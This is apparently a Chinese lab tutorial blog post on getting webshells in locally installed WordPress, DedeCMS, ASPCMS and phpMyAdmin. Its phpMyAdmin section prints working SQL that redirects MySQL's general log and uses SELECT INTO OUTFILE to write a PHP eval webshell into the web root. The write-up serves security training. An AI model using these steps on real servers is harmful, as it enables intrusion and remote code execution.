常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)

练习一:wordpress漏洞测试

1.上传包含木马的主题

安装网站

登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包

上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件

练习2:DedeCMS-V5.7.82-UTF8 漏洞测试

安装网站
登录后台管理网站
1.通过文件管理器上传webshell
2.修改模板文件拿webshell

浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接

4.通过后台sql命令执行拿webshell

查看文件属性 发现是刚才写入的文件

进行木马连接

练习3:ASPCMS漏洞测试

登录网站后台

再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功

配置文件中写入了一句话木马

木马连接

练习4:PHPMyAdmin漏洞测试

网站根目录下更新了目录

访问网站 数据库账户密码 登录

1.界面图形化getshell
2.通过日志文件getshell
复制代码
show global variables like '%general%';

查看 状态 (同样也可以在这里进行命令也可以修改日志位置)

复制代码
set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马

复制代码
select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接

3.导入导出getshell

先判断mysql位置

猜测网站路径D:/phpstudy_pro/www

写入木马文件

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';

进行木马连接

相关推荐
上海锝秉工控28 分钟前
防爆拉线位移传感器:工业安全的“隐形守护者”
大数据·人工智能·安全
你不知道我是谁?2 小时前
AI 应用于进攻性安全
人工智能·安全
薄荷椰果抹茶3 小时前
【网络安全基础】第一章---引言
安全·网络安全
zskj_zhyl4 小时前
智绅科技:以科技为翼,构建养老安全守护网
人工智能·科技·安全
zsq4 小时前
【网络与系统安全】域类实施模型DTE
网络·安全·系统安全
00后程序员张6 小时前
免Mac上架实战:全平台iOS App上架流程的工具协作经验
websocket·网络协议·tcp/ip·http·网络安全·https·udp
缘友一世7 小时前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
HMS Core8 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会9 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
unable code11 小时前
攻防世界-Reverse-insanity
网络安全·ctf·reverse